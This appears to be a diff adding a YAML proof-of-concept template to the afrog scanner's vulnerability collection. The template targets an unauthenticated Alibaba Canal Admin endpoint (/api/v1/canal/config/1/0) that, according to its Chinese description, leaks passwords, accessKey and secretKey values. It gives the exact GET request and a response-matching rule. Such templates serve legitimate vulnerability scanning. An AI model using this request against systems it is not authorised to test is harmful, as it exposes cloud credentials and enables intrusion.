■ ■ ■ ■ ■ ■
afrog-pocs/vulnerability/alibaba-canal-config-leak.yaml
| 1 | + | id: alibaba-canal-config-leak |
| 2 | + | |
| 3 | + | info: |
| 4 | + | name: Alibaba Canal config 云密钥信息泄露漏洞 |
| 5 | + | author: zan8in |
| 6 | + | severity: critical |
| 7 | + | description: | |
| 8 | + | 由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露 |
| 9 | + | title="Canal Admin" |
| 10 | + | reference: |
| 11 | + | - http://wiki.peiqi.tech/wiki/webapp/AlibabaCanal/Alibaba%20Canal%20config%20%E4%BA%91%E5%AF%86%E9%92%A5%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html |
| 12 | + | |
| 13 | + | rules: |
| 14 | + | r0: |
| 15 | + | request: |
| 16 | + | method: GET |
| 17 | + | path: /api/v1/canal/config/1/0 |
| 18 | + | expression: response.status == 200 && response.body.bcontains(b'"code":20000') && response.body.bcontains(b'"name":"canal.properties"') |
| 19 | + | expression: r0() |